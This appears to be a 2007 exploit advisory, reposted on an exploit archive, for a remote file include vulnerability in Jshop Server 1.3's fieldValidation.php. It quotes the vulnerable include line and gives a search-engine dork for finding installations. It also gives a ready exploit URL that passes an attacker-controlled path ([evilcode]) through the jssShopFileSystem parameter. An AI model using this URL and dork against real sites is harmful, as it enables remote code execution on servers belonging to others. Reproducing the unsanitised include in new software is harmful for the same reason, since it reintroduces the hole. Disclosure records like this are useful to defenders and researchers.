id: 1381
date: 01/10/2007
title: Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability
author: irvian
cves: 

========================================================================
Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability
========================================================================



==========================================================================
# scripts       : Jshop Server 1.3
# Discovered By : irvian
# script        : http://www.jshop.co.uk/
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork          : powered by jshop
--------------------------------------------------------------------------
file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");


exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]


#  0day.today [2023-03-26]  #